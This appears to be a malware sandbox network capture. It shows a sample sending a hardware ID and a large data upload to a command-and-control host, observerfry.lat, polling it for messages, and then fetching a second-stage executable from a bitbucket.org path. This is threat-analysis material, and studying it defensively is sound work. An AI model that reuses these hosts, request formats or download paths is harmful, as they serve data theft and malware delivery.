2024-12-23 16:21:06 UTC	5260	OUT	Data Raw: 13 c6 1b 09 3d 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 Data Ascii: =QB-?YYj$\|lQJ$nInVZ+?:us}Q0u?4E([:s~
2024-12-23 16:21:07 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:21:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k3sb65ehrksnvh6mrj2ticungo; expires=Fri, 18 Apr 2025 10:07:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9SFVgVLf5GTEhJ4qO%2Fwr7WWBzAIQPrym5XlTU48PGdWlsDYFVSBmzQQNeuKdKtKvsRJzr0%2FQNj%2B22VrifvRs7hT7uosr%2FI6tKc%2BqJoM7lQ4Sveb7RHZ6Sz5rw2dria1oDc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69aecc7ac10f6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1623&rtt_var=639&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21553&delivery_rate=1673352&cwnd=210&unsent_bytes=0&cid=6d073e6b463dbd7b&ts=963&x=0"
2024-12-23 16:21:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:21:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49747	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:08 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=90V9QFL94G User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1180 Host: observerfry.lat
2024-12-23 16:21:08 UTC	1180	OUT	Data Raw: 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 39 30 56 39 51 46 4c 39 34 47 0d 0a 43 6f Data Ascii: --90V9QFL94GContent-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--90V9QFL94GContent-Disposition: form-data; name="pid"1--90V9QFL94GContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--90V9QFL94GCo
2024-12-23 16:21:10 UTC	1123	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:21:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cvh3e5b7p5tutuie69p1h9fceg; expires=Fri, 18 Apr 2025 10:07:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRk0JihDajXezChrbZOnPlnivRs3KtSm5urYdIE0mB2kAiRO9BIsx5Tf7YUQjMZx2vI6nn70%2FiUmh3671GY%2FqZ1eteR1eCfmbGFZHfgiqW8ucRnEazqFdq6Zpk8cH1HbRDY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69aedc5e8b42e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1699&rtt_var=661&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2088&delivery_rate=1625835&cwnd=232&unsent_bytes=0&cid=03489559009382a0&ts=1086&x=0"
2024-12-23 16:21:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-23 16:21:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49759	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:11 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=P5UKJIKOWJM3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584761 Host: observerfry.lat
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: 2d 2d 50 35 55 4b 4a 49 4b 4f 57 4a 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 35 55 4b 4a 49 4b 4f 57 4a 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 35 55 4b 4a 49 4b 4f 57 4a 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 35 55 4b 4a 49 4b 4f Data Ascii: --P5UKJIKOWJM3Content-Disposition: form-data; name="hwid"4523043A06A6F098AC8923850305D13E--P5UKJIKOWJM3Content-Disposition: form-data; name="pid"1--P5UKJIKOWJM3Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--P5UKJIKO
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: a2 36 3d a2 76 c5 61 19 cd ce 1a 27 16 24 b2 6e d6 dd 38 e5 c3 34 9b 6a da d6 b1 78 ff 3b 88 8e 0a 7e 06 99 e3 49 b2 11 51 f0 0c ea c4 dd e6 80 5d 5b 0c 4c 83 26 96 77 4b aa c9 0c 83 f8 9d 5b 62 a4 cb 10 69 fd 74 df b5 73 c4 de 43 d1 b0 af c8 0c 2f 83 89 6a 9d 58 13 ec 29 1c 8a 64 f2 93 54 74 26 0d 00 c6 e6 78 19 fe 14 85 96 76 fa 71 ea 71 63 15 c2 39 f3 1c 41 ea ec 86 22 a3 de 93 12 76 07 1b ca 8d 92 86 28 48 da 6f 9c e2 52 44 cb fd f4 88 26 f0 6d 4a 65 bd 43 25 27 58 85 19 f7 29 54 b3 bc c5 8f 61 d0 a6 f0 e1 9c 93 1e 58 92 ec cb 4a 8f 73 f9 db fb 71 85 40 12 bf 5a c2 0d 43 ac af 4e 6f 8a 9a 33 69 12 75 98 d5 e9 51 ce 2d 28 7f 56 ab 5c 9b 9e bc 58 b7 c3 34 12 c9 4e 43 51 fc 30 97 74 9a 03 c3 0a fb 61 6e 81 e9 6f e3 e7 c6 6b ec d1 0d 45 67 8f c7 ef f5 59 Data Ascii: 6=va'$n84jx;~IQ][L&wK[bitsC/jX)dTt&xvqqc9A"v(HoRD&mJeC%'X)TaXJsq@ZCNo3iuQ-(V\X4NCQ0tanokEgY
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: 99 5d 9a f2 a2 7e ab 31 de 4b 61 8a 05 31 29 1e c2 49 8f 7c 0f 56 bb e5 57 24 57 7c b4 4e 77 8a a4 7b b4 71 9f 63 0e b8 55 89 9f bb bd f8 9f 80 dd 5f b7 3e e1 4f fe 24 2d 0e 8f f5 8a 2e 62 e2 75 c1 54 8d 18 f6 d9 e7 2b de 7c 78 19 e5 4e 1b 34 cc 3d 7d 07 8d eb 81 18 d6 8e 72 ea 1b eb 63 df b1 9b bd 0f 9e ed 9a 0e 4a b5 05 86 1f ff b6 c7 60 bc fb 56 ea c7 92 25 c3 fc 4c 5c d4 f9 5b 6d 6f cf f1 61 8f 29 bb c7 da 45 8a e2 2e 69 96 f7 f2 92 f8 c5 89 18 30 77 62 9e 51 77 90 72 0c 2e 10 a5 ea a4 d8 22 59 fa ef 67 1f f1 a2 b4 7a 9f d8 bf 13 8b b0 7c 98 65 48 35 78 93 53 9d 95 fe a5 9b de ea 13 3d 7b f5 fd e2 1b 99 cd d3 c3 4f 46 78 ee 51 aa 6e 53 a8 15 8c 7c ee d2 03 33 eb 1e 87 79 50 db d2 94 3a da 6e c1 81 4b 56 87 40 c8 fb cc 2d 81 e0 c3 e4 7c b9 ad 13 a9 97 Data Ascii: ]~1Ka1)I\|VW$W\|Nw{qcU_>O$-.buT+\|xN4=}rcJ`V%L\[moa)E.i0wbQwr."Ygz\|eH5xS={OFxQnS\|3yP:nKV@-\|
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: ae 7a 90 e0 a8 a7 02 9b 3b 39 3d 36 ac 9c 08 70 c3 d2 df ae 8c 6f e0 c2 a3 85 6e 4c 1f 2e dc 9a 73 e3 1b 31 d2 df 8a ba e8 a3 4f ef 2b 78 14 7a 6f d6 33 66 65 7f df a6 c0 7e ba 10 b6 f8 09 fb 46 72 75 27 9f ab 9e d0 de c8 9d db b3 fb 2d f9 d1 69 1c 92 eb 96 2b f5 30 14 69 12 8c 38 77 3f 9c e9 2b e4 f5 14 b4 aa 86 db 9b c8 2f 3a e1 6d 54 70 43 9b 8e b0 27 69 ed d2 81 c1 be ef 7c f8 b2 e1 74 3b 0e 8d 63 a3 b5 30 aa b5 55 f8 9a 96 7a 74 8f 02 b9 b0 d6 98 f5 d1 6f cb 58 3d 28 6c 6b e5 db 55 cb 44 2b 21 d2 a9 41 24 d5 1c 06 8b 97 07 17 b1 7a 72 30 a2 a1 26 69 df 5d d3 4b 67 18 67 13 8f 80 5e 11 f4 29 6b 32 d9 16 d8 9a 12 73 af a8 44 ee 7d 27 20 77 08 cc 1a 8e 6c de be ce 07 ca 34 63 4f 24 45 96 ef 0e 82 83 fd 42 40 00 d6 23 09 64 62 c8 73 ad c8 0f 28 5c f7 8f Data Ascii: z;9=6ponL.s1O+xzo3fe~Fru'-i+0i8w?+/:mTpC'i\|t;c0UztoX=(lkUD+!A$zr0&i]Kgg^)k2sD}' wl4cO$EB@#dbs(\
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: 84 59 ba fe 43 e2 2e 30 02 ea b6 0a 40 77 58 f6 4a 5f 54 05 5d 52 8c e7 70 d1 3a 82 05 25 2c 59 4b 9c 69 f2 b4 55 c6 e8 e0 c1 b8 10 b9 a5 1d d0 37 86 5e 81 68 15 de 76 ec 4b 39 ac 22 78 d9 c0 1e 6e a6 8b 8b ca d4 d9 80 77 c4 e1 b2 2c c8 ef 4e a6 0c d7 3a 02 42 86 78 b3 56 e1 f6 46 a7 f7 03 3d cd 9d 9f de f8 88 6b 8e d5 1e 07 29 74 1b 26 f7 ef 36 39 7c f9 e6 45 e8 17 ea 32 c7 77 58 23 a3 fa c5 4e bd a9 4e ce 4e 86 8f e7 2b 7e fc f9 8f 53 b4 24 fc fa b3 a2 b8 28 10 26 b5 f8 e6 a4 ad 27 6f ea e2 d5 d7 c4 e9 de 4e 0b 37 b8 f1 b1 88 a0 f2 ac 68 e3 c2 a9 30 a8 ec 11 75 9f 8a 87 1b eb c1 98 8c df 53 46 f8 68 e3 b8 08 bf 09 37 c1 4d 07 a4 19 33 eb de 1e 0f 3f e5 cc 64 61 e9 a8 0e d9 bc 57 ca 81 00 ce 19 11 c4 26 04 35 44 f7 71 9f 1d e5 71 1b 53 e3 c1 4f c5 f5 3b Data Ascii: YC.0@wXJ_T]Rp:%,YKiU7^hvK9"xnw,N:BxVF=k)t&69\|E2wX#NNN+~S$(&'oN7h0uSFh7M3?daW&5DqqSO;
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: e9 86 1e 1b a5 06 3c bc 0c 76 f6 6c 1b 8e ee 31 b1 d6 63 5d 98 c4 8b 27 52 5c 44 13 c3 1a f5 27 25 50 d7 85 5d 73 97 55 c7 64 4a 52 52 7c 35 0f 4c 24 17 dd d5 46 a9 c8 af 97 6e 57 96 42 ad 7d a4 36 c8 4e d2 b3 9a 38 a3 26 f2 f0 c0 1d fa 29 55 08 ec 5b 12 a1 d6 6c e0 f0 21 9e 10 dd a8 16 f8 ce bc 67 af dd 57 bb 31 51 30 39 90 34 f1 12 10 f6 31 2e 48 31 e6 1b f7 fa 11 da 3e c3 27 f8 46 00 e3 22 02 a1 9e e0 e0 3b 50 ab 04 28 47 fc 20 00 fa 3d 18 ae 1e f3 48 39 12 fc e1 b2 4d 49 18 2b c3 d3 3e 7f 63 5d e4 20 a9 9c 1b 7f 97 7c 8e c6 2c 70 6a ae 5a eb fb a1 1c fe 97 a7 98 6b ba 9e 59 a0 90 b8 de 8c 26 4b 0a 98 3d 9c 5d d9 ae 32 ba 67 50 c4 6b b5 c6 53 fd 8c fb d7 6a 76 7a d5 62 e6 c4 20 7b 41 8f 4b 4d 96 6a e0 7d 72 2a da f3 83 93 ae a8 8f 71 f2 1b fe 38 54 75 Data Ascii: <vl1c]'R\D'%P]sUdJRR\|5L$FnWB}6N8&)U[l!gW1Q0941.H1>'F";P(G =H9MI+>c] \|,pjZkY&K=]2gPkSjvzb {AKMj}r*q8Tu
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: 04 77 2d 17 6b 83 73 5f 71 df 6c 7f f6 44 85 c4 ef f9 31 87 05 0a 13 f3 a2 0c 51 cc f5 e6 5a d3 be 5e 2f c5 30 15 87 5c 58 b3 75 2e e7 90 8a c0 ce c5 75 3f 3e ca ab 55 69 46 b2 3f f4 4e 99 c4 c2 00 d1 f5 ed 20 b6 cc 78 e9 ca 72 cd ed f9 3b dc 39 8f 47 17 30 20 91 5a b3 b1 da 4a 35 fd 0d 98 68 65 ae f3 a9 4f 5b b9 ca 0b 6f 35 45 3a 87 bb 34 11 ad 57 3c 4f 93 a6 12 66 d6 17 37 92 71 e3 20 7c 66 6a c1 b2 b4 cf a5 99 4e 9b e2 03 54 f6 73 1f 40 41 6d ac 41 54 01 40 3b 0d d1 45 83 c1 7c 8b 1f 38 2e 02 1c 68 1a dc a1 ad ce a1 4b 41 39 f3 34 93 9b 68 e6 ca c0 3f 01 d2 f6 13 a8 3b bc a1 17 71 9f 9c 80 ad 59 16 bd c6 90 42 51 8f 36 23 23 f4 e0 e6 c5 7b 93 94 03 d5 21 36 07 de 79 da f7 ee ad 6c 87 6a 2c 85 d0 33 4b 23 a4 be be b2 52 c7 78 b4 bd 08 6a 1d 82 15 c9 f4 Data Ascii: w-ks_qlD1QZ^/0\Xu.u?>UiF?N xr;9G0 ZJ5heO[o5E:4W<Of7q \|fjNTs@AmAT@;E\|8.hKA94h?;qYBQ6##{!6ylj,3K#Rxj
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: c8 8b cb aa ee 93 df 16 50 58 49 db 90 1f 2a 06 85 cb 73 78 b1 dc 83 a2 b6 4d 57 46 02 eb 12 05 ab 97 50 70 94 ac d9 36 82 f6 83 bf fa 10 a2 e1 13 02 68 e2 29 47 56 90 59 4a e0 f4 4b 32 c8 86 d5 31 9c 4d 08 4e 25 92 05 37 cf ec 03 bd 3a 63 bf 5e 3d 0b 83 6d a4 c1 85 18 c8 06 af f3 02 e4 2b e3 06 fe d2 cd d6 96 02 4d 92 14 31 30 2b 0a b5 42 a4 08 aa d9 0f e1 9c 0b 44 6b 31 ce e5 c8 34 9f 0d 9f 0b dc 44 66 c9 e1 f1 e2 bd 86 43 42 98 03 d8 e6 e3 61 aa a8 d3 9a 90 00 b3 a0 9e 18 03 da 36 07 6a 47 52 ce 92 10 e5 97 c4 85 21 22 3c 80 1d 87 7e bc 6f 54 4c c0 02 5e 48 4c f1 e1 55 f8 33 40 11 f3 ef 37 7d 40 41 ef 15 42 a2 51 f0 34 b8 04 b2 0b 38 58 e6 7f 26 bb a3 23 14 4a 15 09 7a e8 9f 73 59 40 03 18 94 e6 c5 99 c4 a2 ad 5a 84 ea 56 62 38 57 b4 d0 36 dc 44 16 55 Data Ascii: PXI*sxMWFPp6h)GVYJK21MN%7:c^=m+M10+BDk14DfCBa6jGR!"<~oTL^HLU3@7}@ABQ48X&#JzsY@ZVb8W6DU
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: ff 7b 7c 92 ad 41 44 1b d4 eb 02 0e 7e 0b dd 9b fc a7 2a b8 2e c4 47 30 bd 81 ca 8b fb fc 6e ae 4a b4 5a fe 4d 0f 0e c1 0b 7d 5a 11 6a bc 6a 3e 20 1f 27 c5 39 7e 24 49 11 85 da df 95 ad 6e 17 84 43 b9 a6 95 a9 1e 41 21 d7 33 c4 24 67 74 f6 f1 f3 bb 57 60 b7 bd 5b e5 7b f0 13 6f b7 f2 d6 0f 70 18 9b 41 ee 42 0c 1d 6d 4b bb 90 70 6a 2f f7 af 3d 8c 47 90 44 43 ba d6 d5 64 82 a4 b6 f7 b0 92 7d e8 41 ee e3 10 83 87 89 61 c8 77 53 e4 af ab 24 cd 1b cf be f0 a7 4f ff f7 da 53 36 12 cf 45 44 ad c8 4b 92 d8 fc c6 ec 3c f1 e0 fd a2 28 80 9a cd bc a8 d1 cc 8e 66 98 3e 89 d4 db 7c 5d ab 6e c5 5f e3 d5 8a 7c a3 94 c0 58 35 f4 26 08 ef 9f 0e 34 69 95 94 f9 f7 18 fc a9 3f 9e 92 f0 89 a6 82 7d ef ef b7 2e bf 6e 27 4b 93 23 ca 0f 06 c7 ac 7f d9 fe 7a e7 04 f9 0e 6f dc 1f Data Ascii: {\|AD~*.G0nJZM}Zjj> '9~$InCA!3$gtW`[{opABmKpj/=GDCd}AawS$OS6EDK<(f>\|]n_\|X5&4i?}.n'K#zo
2024-12-23 16:21:11 UTC	15331	OUT	Data Raw: a8 6e d7 a1 9b 3b d2 70 29 77 44 4e 4f 6a 14 89 ce ed 7e 57 e3 b7 7e bd 2f 29 ec d2 6b 4c 6f 94 ac 3c c4 ab 78 eb ed 17 c3 4b a0 6e fa 51 a8 39 67 f0 a3 2c 87 d7 5f 36 b0 1e e1 db 76 13 bb f2 bd 41 74 9c bd 73 70 a0 41 cc 03 af 14 de 46 ed 52 a6 fe 38 fb 63 13 e0 0d 7e da 30 2b a5 1b 3a f0 2e 94 1b 3c 9b 8d 96 2f ed 3c a7 3c e7 7c 73 78 27 7b f2 74 67 45 32 6e 75 1b 7b cd 62 a1 af 1c 5d 33 e3 5c c3 d6 28 99 a8 95 ed 1d 8d b1 11 07 ac 77 96 d5 7f 06 07 0e 0b 81 90 e9 9f 00 0c 04 fd f1 9c 65 1f 0f 13 d0 25 3d 13 60 dc 8c 64 0c 08 42 c4 84 13 9e 45 ff 68 28 99 cd f6 36 01 06 1b ff 05 8f 25 d7 31 ff 6f b9 83 36 44 de 88 ba f1 f3 e0 53 d1 8d 58 c5 de f0 94 2d 06 38 3d 94 89 b8 23 cb e6 aa 42 58 83 84 76 34 12 3b 4b 52 38 5b 8a 9a 10 8f 0c a6 97 b5 53 ef 2a ac Data Ascii: n;p)wDNOj~W~/)kLo<xKnQ9g,_6vAtspAFR8c~0+:.</<<\|sx'{tgE2nu{b]3\(we%=`dBEh(6%1o6DSX-8=#BXv4;KR8[S*
2024-12-23 16:21:15 UTC	1128	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jhvfg9st7c43eua4m3vdkqp37u; expires=Fri, 18 Apr 2025 10:07:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XYS7eeXw1lv6Bq9Wc8hR38XvJvdDJ8t7pJ4XK2280fNEW3aTvHWEXYjKjAW9SioNDSYhZ6APIY3O3dNgEY%2BwnXFsmbfgiFrWO7dxzxeH5a9le5yqSQCnJ4N32E4RsxPQWDc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69aeee2fe68c51-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4444&min_rtt=2058&rtt_var=2402&sent=319&recv=607&lost=0&retrans=0&sent_bytes=2836&recv_bytes=587345&delivery_rate=1418853&cwnd=234&unsent_bytes=0&cid=834fef89b91c66ad&ts=3943&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49770	104.21.36.201	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:17 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: observerfry.lat
2024-12-23 16:21:17 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 34 35 32 33 30 34 33 41 30 36 41 36 46 30 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=4523043A06A6F098AC8923850305D13E
2024-12-23 16:21:17 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 16:21:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a9a3fe0rbkhhsj6vuagismupao; expires=Fri, 18 Apr 2025 10:07:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHCJB%2B9SkY%2FUjFl445%2BTKCR3DIzJjup8wtIKU79hGQrodm81BuDHEsGrv%2FW2L5MXEsYbTyrIs3UP7DrDv1FDJd%2F3v0SueIlT2GQZSr3Zj6R0m1U6uXO4Hfze%2BUkCiko36bs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f69af0f49e342b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1682&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1702623&cwnd=237&unsent_bytes=0&cid=3eaf2484d482b078&ts=766&x=0"
2024-12-23 16:21:17 UTC	240	IN	Data Raw: 31 31 30 0d 0a 70 53 75 6e 62 2b 43 7a 63 4f 4f 7a 48 6d 48 7a 36 4b 51 4b 4e 74 72 48 50 4f 66 61 52 41 41 44 34 70 39 30 70 6d 68 33 33 2f 7a 2b 55 49 55 61 77 6f 6c 53 69 38 64 71 45 59 44 53 2b 43 56 71 39 61 56 56 6b 37 67 78 59 32 69 48 36 31 72 4a 47 68 43 44 30 38 68 53 79 51 71 58 78 42 2b 52 32 47 30 52 6b 6f 76 42 4f 77 54 70 39 41 33 56 68 6d 74 7a 59 49 7a 37 4b 49 6b 4d 47 4b 69 53 79 55 54 47 43 35 50 76 58 36 58 63 62 41 79 53 6e 4e 42 6a 57 4c 32 45 56 49 61 6f 4c 58 52 69 67 50 4d 52 69 41 30 50 75 74 36 4a 43 63 45 62 77 6f 6c 41 7a 35 46 37 51 38 6e 5a 32 53 5a 4e 2b 4c 49 65 33 66 67 73 64 48 65 53 70 53 69 4a 4e 46 6a 75 78 4a 41 46 6c 56 37 56 6e 55 48 53 67 44 42 51 78 62 53 4c 5a 56 43 Data Ascii: 110pSunb+CzcOOzHmHz6KQKNtrHPOfaRAAD4p90pmh33/z+UIUawolSi8dqEYDS+CVq9aVVk7gxY2iH61rJGhCD08hSyQqXxB+R2G0RkovBOwTp9A3VhmtzYIz7KIkMGKiSyUTGC5PvX6XcbAySnNBjWL2EVIaoLXRigPMRiA0Put6JCcEbwolAz5F7Q8nZ2SZN+LIe3fgsdHeSpSiJNFjuxJAFlV7VnUHSgDBQxbSLZVC
2024-12-23 16:21:17 UTC	39	IN	Data Raw: 38 6d 78 4f 44 76 79 49 75 5a 70 72 36 56 6f 70 4b 45 61 76 65 6e 78 75 4c 54 59 57 52 53 74 4c 4f 51 77 3d 3d 0d 0a Data Ascii: 8mxODvyIuZpr6VopKEavenxuLTYWRStLOQw==
2024-12-23 16:21:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49776	185.166.143.49	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:19 UTC	248	OUT	GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bitbucket.org
